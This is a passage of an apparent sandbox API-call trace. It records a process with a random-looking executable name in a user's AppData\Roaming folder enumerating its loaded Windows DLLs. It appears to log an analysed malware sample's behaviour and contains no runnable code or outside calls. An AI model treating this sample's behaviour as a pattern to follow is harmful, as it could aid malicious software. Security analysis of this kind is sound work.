"c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0142.825] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x246a7f8, cb=0xc | out: lpmodinfo=0x246a7f8*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0142.826] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0142.827] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0142.828] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x246c90c, cb=0xc | out: lpmodinfo=0x246c90c*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0142.829] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0142.830] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0142.830] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x246ea08, cb=0xc | out: lpmodinfo=0x246ea08*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0142.831] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0142.832] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0142.833] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x2470b1c, cb=0xc | out: lpmodinfo=0x2470b1c*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0142.834] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0142.835] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0142.836] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x2472c30, cb=0xc | out: lpmodinfo=0x2472c30*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0142.840] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0142.841] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0142.842] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x2474d3c, cb=0xc | out: lpmodinfo=0x2474d3c*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0142.843] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0142.844] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0142.845] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x2476e50, cb=0xc | out: lpmodinfo=0x2476e50*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0142.846] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0142.847] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0142.848] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x2478f7c, cb=0xc | out: lpmodinfo=0x2478f7c*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0142.849] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0142.851] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0142.852] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x247b088, cb=0xc | out: lpmodinfo=0x247b088*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0142.854] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0142.855] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0142.857] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x247d19c, cb=0xc | out: lpmodinfo=0x247d19c*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0142.858] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0142.859] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0142.860] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x247f2a8, cb=0xc | out: lpmodinfo=0x247f2a8*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0142.862] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0142.863] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0142.864] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x24813b4, cb=0xc | out: lpmodinfo=0x24813b4*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0142.865] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0142.867] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0142.868] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x24834c0, cb=0xc | out: lpmodinfo=0x24834c0*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0142.872] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0142.873] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0142.874] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x24855d4, cb=0xc | out: lpmodinfo=0x24855d4*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0142.875] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0142.876] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0142.878] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x24876e8, cb=0xc | out: lpmodinfo=0x24876e8*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0142.879] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0142.880] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0142.881] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x24897f4, cb=0xc | out: lpmodinfo=0x24897f4*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0142.882] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0142.884] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0142.885] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x248b900, cb=0xc | out: lpmodinfo=0x248b900*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0142.886] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0142.888] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0142.889] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x248da14, cb=0xc | out: lpmodinfo=0x248da14*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0142.890] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0142.891] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0142.892] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x248fb20, cb=0xc | out: lpmodinfo=0x248fb20*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0142.894] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0142.895] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0142.896] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x2491c2c, cb=0xc | out: lpmodinfo=0x2491c2c*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0142.897] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0142.898] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0142.900] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x2493f5c, cb=0xc | out: lpmodinfo=0x2493f5c*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0142.903] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0142.904] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0142.906] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x2496068, cb=0xc | out: lpmodinfo=0x2496068*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0142.907] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0142.908] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0142.910] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x2498174, cb=0xc | out: lpmodinfo=0x2498174*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0142.911] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0142.912] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0142.914] CloseHandle (hObject=0x2a0) returned 1 [0142.921] GetCurrentProcessId () returned 0xbb4 [0142.921] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0142.921] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x25a63fc, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x25a63fc, lpcbNeeded=0x19e600) returned 1 [0142.923] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x25a6508, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x25a6508, lpcbNeeded=0x19e600) returned 1 [0142.925] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x25a6748, cb=0xc | out: lpmodinfo=0x25a6748*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0142.925] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0142.925] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0142.925] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x25a8954, cb=0xc | out: lpmodinfo=0x25a8954*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0142.925] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0142.926] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0142.926] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x25aaa58, cb=0xc | out: lpmodinfo=0x25aaa58*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0142.926] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0142.926] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0142.927] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x25acb64, cb=0xc | out: lpmodinfo=0x25acb64*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0142.927] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0142.927] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0142.927] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x25aec78, cb=0xc | out: lpmodinfo=0x25aec78*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0142.928] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0142.928] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0142.928] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x25b0dc0, cb=0xc | out: lpmodinfo=0x25b0dc0*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0142.929] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0142.929] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0142.929] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x25b2ecc, cb=0xc | out: lpmodinfo=0x25b2ecc*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0142.930] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0142.930] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0142.930] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x25b4fe0, cb=0xc | out: lpmodinfo=0x25b4fe0*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0142.931] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0142.931] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0142.932] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x25b70ec, cb=0xc | out: lpmodinfo=0x25b70ec*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0142.932] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0142.933] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0142.933] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x25b9244, cb=0xc | out: lpmodinfo=0x25b9244*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0142.933] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0142.934] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0142.934] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x25bb350, cb=0xc | out: lpmodinfo=0x25bb350*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0142.935] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0142.935] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0142.935] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x25bd45c, cb=0xc | out: lpmodinfo=0x25bd45c*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0142.936] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0142.936] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0142.936] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x25bf570, cb=0xc | out: lpmodinfo=0x25bf570*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0142.937] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0142.937] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0142.937] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x25c16a4, cb=0xc | out: lpmodinfo=0x25c16a4*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0142.938] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0142.938] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0142.939] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x25c37ec, cb=0xc | out: lpmodinfo=0x25c37ec*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0142.939] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0142.940] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0142.940] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x25c58f8, cb=0xc | out: lpmodinfo=0x25c58f8*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0142.940] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0142.941] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0142.941] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x25c7a04, cb=0xc | out: lpmodinfo=0x25c7a04*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0142.942] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0142.942] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0142.943] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x25c9b94, cb=0xc | out: lpmodinfo=0x25c9b94*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 